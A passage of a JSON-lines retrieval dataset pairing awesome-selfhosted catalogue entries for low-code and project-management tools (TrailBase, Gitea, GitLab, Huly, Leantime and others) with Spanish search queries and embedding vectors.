0.00841, 0.05367, 0.02841, -0.03097, 0.01008, 0.03696, -0.03199, -0.01479, -0.00359, 0.05849, -0.03006, 0.07156, -0.02596, -0.03577, -0.05125, 0.00354, 0.03177, -0.01321, -0.0237, -0.03791, -0.03613, -0.04603, -0.0219, -0.02406, -0.10206, -0.06951, -0.00531, 0.09403, -0.03322, 0.05456, -0.03089]} -{"tipo": "pregunta", "herramienta": "Software Development - Low Code", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - Low Code", "tema": "software development - low code", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - Low Code: TrailBase β€” Open, sub-millisecond, single-executable FireBase alternative with type-safe REST & realtime APIs, built-in JS/TS runtime, auth & admin UI [OSL-3.0, Rust/Docker].", "indexar": "ΒΏHay alguna opciΓ³n sub-millisecond para reemplazar Firebase con entorno de ejecuciΓ³n nativo?", "v": [-0.19206, 0.15784, -0.02222, -0.0254, -0.08775, -0.01955, -0.17648, -0.01518, -0.09502, -0.03488, -0.05052, -0.16404, 0.0375, 0.05991, 0.03371, 0.01538, -0.00448, -0.03834, 0.0173, -0.03164, -0.08935, 0.05197, -0.00717, -0.01202, 0.09152, 0.04159, 0.00299, 0.14224, -0.1082, -0.11715, 0.15278, 0.12787, 0.04715, -0.02079, -0.1275, 0.01238, 0.00456, 0.02012, -0.02865, -0.05083, 0.03308, -0.02019, -0.08151, 0.08738, 0.06612, 0.0318, -0.08043, -0.01683, 0.04213, -0.08558, 0.12415, 0.06357, -0.0913, -0.09267, -0.0527, -0.0164, 0.13434, -0.17346, -0.04111, -0.02739, -0.05992, -0.04405, 0.18366, -0.15513, 0.05884, -0.06864, -0.02009, -0.0073, 0.00459, 0.02174, -0.09887, -0.03138, -0.05787, -0.03502, -0.05846, -0.03582, 0.07693, -0.05146, 0.02361, 0.11801, -0.06895, 0.02251, -0.02901, 0.01244, -0.0448, 0.0465, -0.14091, -0.09865, 0.05615, -0.04228, 0.0177, -0.05593, 0.01962, 0.01433, -0.08401, -0.11027, -0.06072, 0.01144, -0.05296, 0.09163, -0.01948, -0.03504, 0.07662, 0.05892, -0.019, 0.01923, 0.05776, -0.08807, -0.02843, -0.03855, 0.00238, 0.07601, 0.01705, -0.0422, -0.04795, -0.08279, -0.01094, -0.03489, 0.08806, -0.0272, -0.07576, 0.01612, 0.01741, -0.08715, 0.00387, -0.02379, -0.02994, -0.09965, -0.09863, 0.02446, -0.02518, -0.00326, 0.0155, -0.08357, -0.07472, 0.11337, 0.11456, -0.05459, -0.05944, -0.04559, -0.03481, 0.0776, 0.0382, 0.04218, 0.10614, 0.01355, 0.05035, -0.00297, 0.09198, 0.05542, -0.01824, -0.04769, -0.04802, 0.0132, -0.10549, 0.05093, -0.06107, 0.09804, 0.02861, 0.00953, -0.0221, -0.06269, -0.08144, -0.03445, -0.05084, 0.00416, 0.01461, -0.01763, 0.02958, 0.046, -0.02095, 0.05235, -0.00213, 0.01278, 0.00124, -0.07045, 0.09921, -0.03623, 0.06561, 0.07791, 0.03079, -0.00708, -0.00617, 0.07091, 0.08957, -0.01344, 0.02085, 0.02235, -0.0643, -0.01465, -0.03769, -0.05722, -0.03551, -0.00247, 0.03549, 0.0277, 0.00353, -0.01587, -0.03665, -0.01106, -0.07063, 0.07687, -0.01508, 0.07639, -0.00775, 0.05364, 0.03458, 0.01722, -0.08188, -0.00246, -0.01127, -0.00735, 0.08406, 0.12009, -0.06225, 0.04183, -0.03644, 0.01119, 0.03638, 0.0252, -0.03673, -0.00224, 0.01365, 0.03264, -0.00702, -0.02469, 0.01203, -0.08022, -0.01012, 0.06001, 0.01184, 0.03514, 0.03277, 0.04439, -0.00188, 0.0083, -0.04312, -0.05921, -0.01853, -0.04924, -0.00952, 0.03307, -0.02884, 0.02154, 0.01326, 0.07409, -0.02789, -0.00047, 0.05344, -0.01301, -0.08303, -0.04481, -0.05925, -0.00531, -0.04756, -0.00226]} -{"tipo": "pregunta", "herramienta": "Software Development - Project Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - Project Management", "tema": "software development - project management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - Project Management: Cgit β€” Fast lightweight web interface for git repositories [GPL-2.0, C]. Forgejo β€” A lightweight software forge focused on scaling, federation, and privacy (fork of Gitea) [MIT, Docker/Go]. Fossil β€” Distributed version control system featuring wiki and bug tracker [BSD-2-Clause-FreeBSD, C]. Gerrit β€” Code review and project management tool for Git-based projects [Apache-2.0, Java/Docker]. gitbucket β€” Git platform powered with easy installation, high extensibility & GitHub API compatibility (alternative to GitHub) [Apache-2.0, Scala/Java]. Gitea β€” Git with a cup of tea! Painless self-hosted all-in-one software development service, including Git hosting, code review, team collaboration, package registry and CI/CD [MIT, Go/Docker/K8S]. GitLab β€” Self Hosted Git repository management, code reviews, issue tracking, activity feeds and wikis [MIT, Ruby/deb/Docker/K8S]. Gogs β€” Painless self-hosted Git Service written in Go [MIT, Go].", "indexar": "que programa puedo usar para gestionar el cΓ³digo y hacer revisiones en mi servidor?", "v": [-0.01664, 0.02074, -0.17246, -0.24855, -0.03292, -0.15527, 0.00641, -0.03324, -0.06926, -0.11923, -0.10884, -0.14944, 0.06248, -0.13296, 0.01546, 0.00951, 0.19472, -0.09184, 0.05042, 0.06833, 0.0282, 0.02202, 0.04293, -0.01035, -0.06787, 0.07733, 0.08613, -0.08725, -0.04756, -0.07814, -0.01569, -0.02219, 0.07279, -0.06949, -0.03909, 0.06506, 0.08889, 0.11575, -0.04579, 0.07582, 0.01116, 0.03681, -0.07776, 0.02097, 0.09559, -0.03933, 0.16007, -0.02154, 0.0253, -0.00034, -0.08569, -0.07409, -0.09185, 0.009, 0.02912, -0.05469, 0.03878, -0.19497, -0.07786, -0.00638, -0.0414, -0.02939, -0.01035, -0.02935, 0.02526, -0.03605, 0.0613, -0.01139, -0.11398, 0.07092, -0.09222, 0.07903, -0.03789, -0.03563, 0.03828, -0.00095, 0.0545, -0.06945, 0.06591, 0.04086, -0.04691, 0.06449, -0.01004, 0.0912, -0.07617, -0.0631, -0.02886, -0.09717, 0.02123, -0.02392, 0.0203, -0.03013, -0.05288, -0.00802, 0.04171, 0.01271, 0.11268, 0.03748, 0.04049, 0.02622, 0.13177, -0.04459, 0.01382, 0.12906, 0.03072, 0.11083, 0.15862, -0.08017, 0.01325, 0.005, -0.02963, -0.07324, -0.11967, -0.04957, -0.10697, 0.00028, -0.00329, -0.00333, 0.02619, -0.02537, -0.10173, -0.01684, -0.03503, 0.02786, 0.12455, 0.02, 0.08149, 0.11453, -0.04763, -0.00635, -0.10453, -0.03657, -0.03845, -0.02623, -0.0382, 4e-05, 0.03618, -0.01079, -0.00724, -0.013, -0.06782, 0.07297, -0.00085, 0.14192, 0.09847, -0.02312, 0.01085, -0.09837, -0.05001, 0.0273, 0.08315, -0.04449, -0.04907, 0.03729, -0.10224, -0.00094, 0.04698, -0.05169, -0.09297, 0.02934, -0.04413, 0.01675, 0.00909, 0.00838, 0.07665, -0.00814, 0.01006, 0.06209, 0.05853, 0.03457, -0.0018, 0.04472, 0.07558, -0.04422, 0.09101, -0.02851, -0.02404, -0.07457, -0.02101, 0.0312, -0.02516, 0.03338, 0.0416, -0.0092, -0.02591, -0.02072, -0.00912, 0.10291, -0.0185, -0.01467, 0.02208, 0.04573, 0.01782, 0.03148, 0.03697, -0.03384, 0.01852, -0.00875, -0.03978, -0.08355, -0.06105, 0.00539, -0.0236, -0.06471, 0.04207, 0.03098, -0.02696, 0.0161, 0.05618, 0.06235, -0.01905, -0.01737, 0.08091, -0.00046, -0.06385, -0.01537, 0.02432, 0.02585, 0.05276, -0.03986, 0.00147, -0.017, 0.00551, 0.02834, 0.01521, -0.0498, 0.02699, 0.01025, 0.03099, 0.01899, -0.02846, 0.01371, -0.01312, 0.00451, 0.03897, -0.01894, 0.03116, -0.04419, -0.02019, -0.10926, -0.0215, 0.07864, 0.01133, -0.04923, -0.01335, -0.02201, -0.0467, -0.00673, -0.05661, 0.0191, -0.02235, -0.04867, 0.02826, -0.06046, -0.0037, 0.02874]} -{"tipo": "pregunta", "herramienta": "Software Development - Project Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - Project Management", "tema": "software development - project management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - Project Management: Cgit β€” Fast lightweight web interface for git repositories [GPL-2.0, C]. Forgejo β€” A lightweight software forge focused on scaling, federation, and privacy (fork of Gitea) [MIT, Docker/Go]. Fossil β€” Distributed version control system featuring wiki and bug tracker [BSD-2-Clause-FreeBSD, C]. Gerrit β€” Code review and project management tool for Git-based projects [Apache-2.0, Java/Docker]. gitbucket β€” Git platform powered with easy installation, high extensibility & GitHub API compatibility (alternative to GitHub) [Apache-2.0, Scala/Java]. Gitea β€” Git with a cup of tea! Painless self-hosted all-in-one software development service, including Git hosting, code review, team collaboration, package registry and CI/CD [MIT, Go/Docker/K8S]. GitLab β€” Self Hosted Git repository management, code reviews, issue tracking, activity feeds and wikis [MIT, Ruby/deb/Docker/K8S]. Gogs β€” Painless self-hosted Git Service written in Go [MIT, Go].", "indexar": "cual es una alternativa ligera a gitlab para hosting de repositorios?", "v": [-0.00324, -0.12894, -0.16223, -0.07162, 0.09632, -0.15268, -0.11502, 0.07125, -0.14782, -0.00711, -0.00794, -0.17502, 0.06943, 0.08174, 0.22281, -0.07343, -0.00631, -0.04876, -0.00341, -0.12208, -0.12128, 0.17859, 0.00539, -0.08756, 0.03489, -0.02336, 0.19866, 0.06797, -0.07799, 0.09968, -0.07098, -0.01471, -0.04392, 0.01924, -0.17711, 0.13305, 0.13146, 0.03837, 0.04656, 0.08339, 0.01279, 0.01473, -0.0041, 0.06011, -0.1026, -0.17443, 0.02746, -0.02343, -0.0214, -0.03837, -0.07157, 0.04315, -0.02274, 0.02723, 0.08217, 0.00666, 0.04998, -0.19711, -0.0022, -0.0178, -0.11589, 0.06825, 0.04934, -0.05188, 0.05243, 0.04066, -0.11856, -0.06895, -0.16976, 0.0441, -0.03533, 0.08718, 0.026, -0.02823, -0.09943, 0.0012, -0.05749, -0.07828, -0.02686, 0.01363, 0.02106, -0.02625, 0.08516, 0.05256, -0.09139, -0.14207, 0.04863, -0.01345, 0.03267, 0.0433, -0.04112, -0.00553, -0.02419, 0.07768, -0.02266, -0.13354, 0.12825, -0.00262, -0.06226, -0.08197, 0.01179, 0.03779, -0.00342, 0.03231, 0.04394, -0.00768, 0.01459, -0.00883, -0.09681, -0.01503, 0.11079, 0.07078, -0.01377, 0.04525, 0.04954, 0.00488, -0.02712, 0.01346, 0.0249, -0.02744, 0.02551, -0.04205, -0.07211, -0.02129, 0.03229, 0.07308, 0.05218, -0.05048, -0.00234, -0.03253, 0.0423, -0.10497, -0.00891, 0.00042, -0.13189, 0.00672, 0.04991, -0.06641, 0.04616, 0.02943, 0.02462, 0.03468, 0.00812, -0.00843, 0.04324, 5e-05, 0.00691, 0.02055, 0.00706, -0.02945, -0.02136, -0.00841, 0.00319, 0.03287, -0.10889, -0.03277, -0.00942, 0.02082, -0.07275, 0.0418, 0.06523, 0.0019, -0.02619, 0.04181, -0.00219, 0.00533, 0.09005, 0.01703, -0.05258, 0.06859, 0.05364, 0.05424, -0.02593, -0.03276, 0.03098, -0.05208, -0.02547, -0.10239, 0.04449, -0.01058, 0.01343, -0.00066, 0.00312, 0.04201, 0.05779, -0.01661, 0.03504, 0.04816, -0.00901, 0.01092, -0.03263, -0.01451, -0.0597, -0.08813, 0.02939, 0.01415, 0.01896, -0.06583, -0.02658, 0.00734, -0.00652, 0.02897, -0.00581, -0.01941, -0.04665, -0.02598, -0.06324, 0.01006, 0.01354, -0.0553, 0.03812, 0.08247, 0.00078, 0.01796, -0.0014, -0.01301, -0.03139, 0.0422, 0.01239, -0.0103, -0.01673, -0.01662, -0.00975, 0.05133, -0.00532, 0.00049, -0.00539, 0.0033, -0.031, -0.00525, 0.0313, -0.00493, 0.04204, 0.02515, 0.02122, -0.00871, -0.00826, 0.06405, 0.01682, 0.00462, 0.00055, 0.03274, -0.01576, -0.00221, -0.00437, 0.02098, -0.0313, -0.02011, -0.04369, -0.01287, 0.00405, -0.03714, 0.01454, -0.03859, -0.00129, 0.07326]} -{"tipo": "pregunta", "herramienta": "Software Development - Project Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - Project Management", "tema": "software development - project management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - Project Management: Cgit β€” Fast lightweight web interface for git repositories [GPL-2.0, C]. Forgejo β€” A lightweight software forge focused on scaling, federation, and privacy (fork of Gitea) [MIT, Docker/Go]. Fossil β€” Distributed version control system featuring wiki and bug tracker [BSD-2-Clause-FreeBSD, C]. Gerrit β€” Code review and project management tool for Git-based projects [Apache-2.0, Java/Docker]. gitbucket β€” Git platform powered with easy installation, high extensibility & GitHub API compatibility (alternative to GitHub) [Apache-2.0, Scala/Java]. Gitea β€” Git with a cup of tea! Painless self-hosted all-in-one software development service, including Git hosting, code review, team collaboration, package registry and CI/CD [MIT, Go/Docker/K8S]. GitLab β€” Self Hosted Git repository management, code reviews, issue tracking, activity feeds and wikis [MIT, Ruby/deb/Docker/K8S]. Gogs β€” Painless self-hosted Git Service written in Go [MIT, Go].", "indexar": "con que herramienta montarΓ­a un sistema completo de control de versiones y seguimiento de bugs?", "v": [0.07696, 0.06474, -0.11861, -0.16103, -0.01676, -0.07498, -0.13844, -0.05656, 0.02078, -0.12652, -0.15714, -0.04144, -0.01615, -0.0113, 0.05057, -0.05327, -0.05691, -0.19502, -0.0631, 0.01081, -0.06545, -0.0889, -0.03769, 0.00056, -0.04826, 0.09667, 0.05993, -0.07059, -0.16403, -0.01334, 0.00512, 0.00277, 0.06318, -0.02082, -0.17989, -0.05443, -0.01666, -0.02376, 0.02691, 0.07943, -0.0334, -0.05158, 0.036, 0.03792, 0.10274, -0.10597, 0.06055, 0.04954, 0.01672, -0.03769, -0.08422, -0.0825, -0.12405, 0.03702, -0.00087, -0.25642, 0.14996, -0.10497, 0.06714, -0.10842, -0.0917, 0.10575, -0.02361, 0.0086, 0.02799, -0.02781, 0.00809, -0.13384, -0.06706, 0.10183, 0.00872, -0.03549, 0.08759, 0.02291, -0.08854, -9e-05, 0.00287, 0.03762, -0.06786, -0.02972, 0.04359, -0.05631, -0.12068, 0.10012, -0.00353, -0.03324, -0.03394, -0.06049, -0.03327, -0.09319, 0.05322, 0.00595, 0.03731, 0.02997, 0.05308, -0.02103, 0.07691, -0.01597, 0.01056, -0.02478, 0.0907, -0.07299, -0.01285, 0.13868, -0.06964, 0.00276, 0.05456, -0.02603, -0.00864, 0.00711, -0.00858, 0.02466, 0.00517, 0.03444, -0.00953, 0.00611, 0.01161, 0.08255, -0.04502, -0.09073, -0.02774, 0.10548, -0.06274, -0.082, 0.13134, -0.03563, -0.031, 0.09588, -0.0121, -0.08901, 0.07647, -0.03685, -0.09209, 0.02211, 0.0526, 0.00842, -0.01906, 0.02806, -0.03804, -0.0245, -0.09403, 0.09219, 0.03813, -0.06778, 0.08191, -0.01639, -0.03875, -0.06573, 0.03144, 0.0065, 0.01732, 0.05787, 0.02631, -0.05958, -0.01893, -0.06161, -0.01689, 0.0309, -0.00218, 0.01938, 0.04706, -0.00991, 0.03048, 0.00146, 0.01484, -0.04695, 0.07898, -0.02064, 0.07059, -0.00055, -0.00845, 0.05508, 0.05989, -0.0663, 0.0042, -0.09199, -0.05463, -0.03807, 0.05074, -0.06589, -0.07708, 0.04045, -0.02431, -0.00973, 0.05278, -0.03436, -0.02511, 0.03369, -0.0114, -0.00941, 0.04603, 0.03861, 0.01561, -0.05229, 0.02734, 0.03335, -0.01393, 0.00866, 0.0143, 0.01773, -0.08573, 0.00586, -0.00426, -0.08191, -0.01848, 0.09508, 0.0354, 0.05402, 0.0228, 0.05849, 0.06481, 0.05394, -0.00709, 0.01862, -0.02887, -0.0178, -0.01303, 0.04579, 0.04599, -0.06284, 0.05388, -0.01871, 0.05895, 0.05581, -0.00933, -0.07017, -0.00051, 0.05337, -0.00023, -0.00993, 0.00528, -0.06545, 0.04168, -0.00514, -0.01249, -0.05946, 0.04557, -0.02034, -0.03597, -0.07318, -0.03814, 0.06878, 0.08432, -0.03919, -0.08522, -0.1014, 0.00051, -0.03444, -0.02431, -0.06227, -0.05043, 0.01436, 0.01382, -0.0717, -0.00672, -0.02791]} -{"tipo": "pregunta", "herramienta": "Software Development - Project Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - Project Management", "tema": "software development - project management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - Project Management: Huly β€” All-in-one project management platform (alternative to Linear, Jira, Slack, Notion, Motion) [EPL-2.0, Docker/K8S/Nodejs]. Ideon β€” Project workspace built around an infinite canvas; embed GitHub, GitLab, Gitea, and Forgejo repositories alongside notes, links, and tasks, with real-time collaboration [AGPL-3.0, Docker]. Kaneo β€” Project management platform focused on simplicity and efficiency [MIT, K8S/Docker]. Leantime β€” Lean project management system for small teams and startups helping to manage projects from ideation through delivery [AGPL-3.0, PHP/Docker]. Mindwendel β€” Brainstorm and upvote ideas and thoughts within your team [AGPL-3.0, Docker/Elixir]. minimal-git-server β€” Lightweight git server with a basic CLI to manage repositories, supporting multiple accounts and running in a container [MIT, Docker]. Octobox β€” Take back control of your GitHub Notifications [⚠, AGPL-3.0, Ruby/Docker].", "indexar": "que alternativa libre a Linear o Jira me sirve para gestionar proyectos en equipo?", "v": [-0.11846, 0.07072, -0.18336, -0.2024, -0.01359, -0.10356, -0.09206, -0.01345, -0.07111, -0.12869, 0.04639, -0.12468, 0.0881, 0.03367, 0.22856, 0.02575, 0.1174, -0.03881, 0.04793, -0.07932, -0.10331, 0.10323, 0.04623, -0.16532, -0.0281, -0.03756, 0.07925, -0.14444, -0.08962, 0.04609, -0.02219, 0.00323, 0.14422, -0.05516, 0.0996, 0.02592, 0.04924, 0.07409, 0.04611, -0.0029, -0.01682, -0.00525, -0.0016, -0.01274, 0.07389, 0.0289, 0.09421, -0.00974, 0.01645, 0.04096, -0.13816, -0.00717, -0.05354, 0.05456, 0.07323, -0.03504, 0.05535, -0.16948, -0.11268, -0.10723, -0.08855, -0.05661, -0.06611, -0.07351, 0.12485, 0.07211, -0.07066, -0.02283, -0.10827, -0.02461, 0.01916, 0.05998, 0.06477, -0.10236, -0.08524, -0.04887, 0.03726, 0.08332, 0.03046, 0.00659, 0.07068, 0.02265, -0.04705, 0.01755, 0.02777, -0.05585, 0.03712, -0.01968, 0.02494, 0.02908, 0.02906, -0.05063, -0.07118, -0.03081, -0.06626, -0.00403, 0.04547, 0.0783, 0.07893, 0.0101, -0.00514, 0.03711, -0.09749, -0.01688, 0.00517, 0.0809, 0.06331, 0.02464, -0.0377, 0.00469, -0.02017, 0.00546, 0.04478, 0.0348, -0.01089, -0.0055, -0.05601, 0.06963, -0.0222, 0.04527, 0.02219, -0.12463, 0.0118, -0.04394, 0.00437, -0.03945, 0.00468, 0.0339, 0.00895, 0.08726, -0.03916, 0.01668, -0.04438, 0.00154, -0.1791, 0.0052, 0.02787, 0.01396, -0.01358, -0.027, -0.10456, 0.10637, -0.06793, -0.00842, 0.02632, -0.04051, 0.04043, -0.07357, 0.10425, -0.01761, 0.02607, -0.0634, -0.05833, 0.12551, -0.07351, 0.02773, 0.01534, 0.02618, -0.05915, 0.09466, -0.01684, -0.06032, 0.00688, 0.09462, 0.00605, -0.03055, -0.00398, 0.00482, 0.02843, 0.07777, 0.00511, 0.03494, 0.06733, -0.04485, 0.04649, -0.04243, 0.04734, -0.08381, 0.05632, -0.03174, -0.05227, -0.01971, -0.05797, 0.04472, 0.01458, -0.03355, -0.0448, 0.01048, -0.01643, 0.0656, -0.05745, 0.03829, -0.01232, -0.08766, -0.035, 0.03851, 0.01656, -0.04434, -0.02025, 0.03689, -0.03135, 0.00834, 0.08997, 0.04544, -0.0732, 0.03332, -0.03657, 0.07297, 0.04859, 0.08334, 0.1111, 0.00902, 0.04657, -0.03087, -0.03851, -0.03071, 0.0283, -0.02468, 0.02822, 0.03387, 0.02029, -0.00501, -0.00529, 0.01726, 0.04859, 0.01689, -0.0176, 0.02044, -0.07406, -0.0067, 0.06319, 0.01677, -0.00093, 0.0427, -0.02198, -0.07362, 0.0102, 0.0224, -0.0004, 0.01755, 0.06573, 0.06864, -0.03571, 0.02922, -0.03427, 0.00818, -0.04892, -0.00025, -0.02126, -0.01124, -0.05915, 0.05265, 0.0056, 0.05934, 0.0236, 0.01588]} -{"tipo": "pregunta", "herramienta": "Software Development - Project Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - Project Management", "tema": "software development - project management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - Project Management: Huly β€” All-in-one project management platform (alternative to Linear, Jira, Slack, Notion, Motion) [EPL-2.0, Docker/K8S/Nodejs]. Ideon β€” Project workspace built around an infinite canvas; embed GitHub, GitLab, Gitea, and Forgejo repositories alongside notes, links, and tasks, with real-time collaboration [AGPL-3.0, Docker]. Kaneo β€” Project management platform focused on simplicity and efficiency [MIT, K8S/Docker]. Leantime β€” Lean project management system for small teams and startups helping to manage projects from ideation through delivery [AGPL-3.0, PHP/Docker]. Mindwendel β€” Brainstorm and upvote ideas and thoughts within your team [AGPL-3.0, Docker/Elixir]. minimal-git-server β€” Lightweight git server with a basic CLI to manage repositories, supporting multiple accounts and running in a container [MIT, Docker]. Octobox β€” Take back control of your GitHub Notifications [⚠, AGPL-3.0, Ruby/Docker].", "indexar": "con quΓ© programa puedo montar un espacio de trabajo infinito para unir mis repositorios y notas?", "v": [0.05822, 0.00371, -0.1388, -0.15736, -0.02801, -0.10261, -0.10799, -0.05095, -0.21959, -0.07528, 0.02838, -0.07356, 0.10209, 0.02523, -0.04214, 0.0529, 0.14592, -0.05956, 0.03855, 0.0466, -0.07615, -0.08478, -0.07702, -0.04956, -0.01673, -0.04256, -0.05749, 0.00853, 0.00395, 0.09808, -0.05331, 0.07798, 0.13251, -0.08866, -0.09394, -0.02388, 0.08947, 0.10297, -0.0118, -0.03091, 0.01775, 0.11103, -0.03891, 0.12791, 0.00983, -0.09963, 0.09669, -0.05799, 0.01083, 0.09117, 0.02143, -0.00308, 0.00505, -0.02606, 0.01751, -0.10024, 0.08293, -0.05933, -0.08007, 0.06407, -0.09154, 0.16483, -0.0807, -0.04595, 0.07959, 0.05179, -0.04998, 0.02807, -0.07972, 0.09557, -0.12188, 0.02433, 0.0702, -0.11119, -0.07421, 0.08941, -0.09375, -0.09697, -0.02453, -0.04446, -0.10479, 0.04077, 0.00901, 0.08637, -0.01489, -0.03935, 0.0741, -0.05548, -0.10737, 0.10848, -0.05367, 0.03941, -0.03177, 0.02155, 0.04754, -0.03461, 0.05276, 0.10974, -0.04736, -0.00514, 0.01438, 0.03861, -0.06148, -0.01083, 0.00472, 0.18181, 0.0225, 0.03521, -0.02044, 0.01657, -0.00059, 0.04188, -0.05975, -0.09768, -0.09615, -0.09135, 0.01123, 0.07803, 0.01742, -0.11234, -0.04228, 0.11815, 0.02983, 0.06503, 0.14551, -0.09376, 0.11062, 0.079, 0.04757, 0.06189, -0.05595, 0.00828, -0.00635, -0.07008, -0.01601, -0.02411, 0.03645, -0.01463, 0.00201, -0.0592, 0.07044, -0.02445, 0.01396, 0.02139, -0.05553, 0.06498, 0.04652, -0.02261, -0.01672, -0.08157, -0.00429, 0.07914, -0.01245, 0.01408, -0.05335, -0.05482, 0.08813, 0.06087, -0.04415, -0.04302, 0.02649, 0.08025, -0.06736, 0.03329, -0.00638, -0.06568, 0.03474, 0.02129, -0.00468, 0.08523, -0.02661, 0.02204, 0.06171, -0.06076, 0.0602, 0.01755, -0.00396, -0.03889, 0.03367, 0.0237, -0.04902, -0.00828, 0.05918, 0.03409, 0.00182, -0.01216, 0.05742, 0.03211, 0.01854, 0.08373, 0.0017, -0.02198, -0.01061, -0.00767, 0.05872, -0.036, 0.0162, 0.02749, -0.00441, 0.01632, -0.00031, -0.03781, -0.00163, 0.0732, 0.01976, 0.00061, -0.02599, 0.02558, 0.04387, 0.03774, 0.07489, -0.06185, 0.02245, 0.05536, -0.07069, 0.04157, 0.00783, 0.06007, 0.01552, 0.01431, 0.00999, -0.00301, 0.05999, -0.03316, -0.02361, -0.02029, -0.02545, 0.01602, 0.04674, 0.02618, 0.04335, -0.061, -0.06022, -0.05744, -0.00637, 0.01209, 0.02341, 0.07416, 0.05333, -0.05982, -0.0213, 0.1274, 0.00625, -0.05198, -0.04836, 0.02709, -0.05373, 0.02925, -0.04549, 0.03074, -0.02561, -0.01485, -0.02275, -0.06563, -0.03248, 0.04886]} -{"tipo": "pregunta", "herramienta": "Software Development - Project Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - Project Management", "tema": "software development - project management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - Project Management: Huly β€” All-in-one project management platform (alternative to Linear, Jira, Slack, Notion, Motion) [EPL-2.0, Docker/K8S/Nodejs]. Ideon β€” Project workspace built around an infinite canvas; embed GitHub, GitLab, Gitea, and Forgejo repositories alongside notes, links, and tasks, with real-time collaboration [AGPL-3.0, Docker]. Kaneo β€” Project management platform focused on simplicity and efficiency [MIT, K8S/Docker]. Leantime β€” Lean project management system for small teams and startups helping to manage projects from ideation through delivery [AGPL-3.0, PHP/Docker]. Mindwendel β€” Brainstorm and upvote ideas and thoughts within your team [AGPL-3.0, Docker/Elixir]. minimal-git-server β€” Lightweight git server with a basic CLI to manage repositories, supporting multiple accounts and running in a container [MIT, Docker]. Octobox β€” Take back control of your GitHub Notifications [⚠, AGPL-3.0, Ruby/Docker].", "indexar": "cual es una herramienta simple para gestionar proyectos desde la idea hasta la entrega sin complicaciones?", "v": [-0.0344, 0.15364, -0.18293, -0.16292, 0.07167, -0.16452, -0.02971, 0.02, -0.09298, -0.04251, -0.14194, -0.07971, 0.05341, -0.06778, 0.07551, 0.06077, 0.16745, -0.10187, -0.05981, -0.013, -0.07988, 0.0926, -0.02173, -0.10018, -0.17119, -0.02272, 0.07169, -0.02845, -0.12497, 0.0879, -0.03119, -0.05776, 0.09061, -0.0888, -0.03242, -0.02647, -0.03576, 0.09481, 0.0176, -0.00249, -0.08429, -0.00602, -0.00135, 0.07099, 0.04949, -0.07264, 0.06799, 0.00553, 0.03443, 0.02037, -0.12385, -0.08271, -0.13225, -0.03862, 0.04167, -0.06652, 0.18547, -0.24167, 0.0013, -0.02656, -0.05751, 0.05876, -0.03514, -0.07632, 0.05869, -0.04033, -0.0588, -0.04816, -0.08076, 0.00645, 0.05167, 0.03318, 0.00761, -0.07562, 0.03255, -0.00346, 0.01, -0.00131, -0.03624, 0.00381, 0.11248, -0.0079, -0.09784, -0.05304, -0.00177, -0.12432, 0.05843, 0.02025, 0.03537, -0.0207, -0.06787, -0.03607, -0.01066, -0.0561, -0.02231, -0.01627, 0.12458, -0.00937, -0.04646, -0.02724, 0.01313, -0.06837, -0.10879, 0.02403, -0.08465, 0.0454, -0.01317, 0.01885, -0.08581, -0.01947, -0.11593, 0.06563, 0.071, -0.03395, -0.09059, 0.08733, 0.0132, -0.02018, -0.02371, -0.04887, 0.0251, -0.00225, -0.02999, -0.01108, 0.03942, -0.03019, -0.06456, 0.05825, 0.00455, 0.00626, -0.03905, -0.06235, -0.07804, 0.01662, -0.04292, 0.00907, 0.00038, -0.15012, -0.00697, -0.05422, -0.03859, 0.06364, -0.00938, -0.09766, -0.00235, -0.05522, 0.02365, -0.0092, 0.07548, 0.05296, 0.0771, -0.06395, 0.0589, 0.04242, -0.04773, 0.05056, 0.01404, 0.07161, -0.04848, 0.05403, -0.0134, -0.01073, 0.06193, 0.02227, 0.00832, -0.09583, -0.02371, 0.05727, 0.03144, 0.05578, 0.02629, 0.02556, -0.01016, 0.03253, 0.02819, -0.13964, -0.06107, -0.07582, 0.04583, -0.06358, -0.04744, 0.07549, -0.04418, 0.03207, 0.0211, -0.07558, -0.01149, 0.0342, -0.01496, 0.04672, 0.01477, 0.01955, -0.00659, -0.06596, 0.05778, 0.031, -0.00826, -0.04033, 0.04092, 0.05931, -0.02217, -0.05726, 0.02907, 0.01363, -0.04883, 0.04932, -0.07171, 0.05195, 0.04355, 0.07892, 0.03914, 0.00034, 0.01527, -0.00178, 0.01319, -0.00741, -0.03329, -0.00358, 0.00664, -0.03487, 0.01287, -0.03132, 0.00623, -0.00137, -0.00121, 0.04438, 0.02612, 0.08668, -0.00818, -0.00487, 0.03546, -0.0048, -0.01361, 0.02943, 0.0512, -0.0676, 0.0468, -0.01296, -0.05055, -0.03987, 0.02553, 0.10611, 0.02281, 0.01793, -0.04085, -0.03333, -0.0434, 0.00324, -0.10841, -0.07649, -0.01523, 0.04623, 0.05781, -0.00745, 0.02873, -0.01591]} -{"tipo": "pregunta", "herramienta": "Software Development - Project Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - Project Management", "tema": "software development - project management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - Project Management: OneDev β€” All-In-One DevOps Platform. With Git Management, Issue 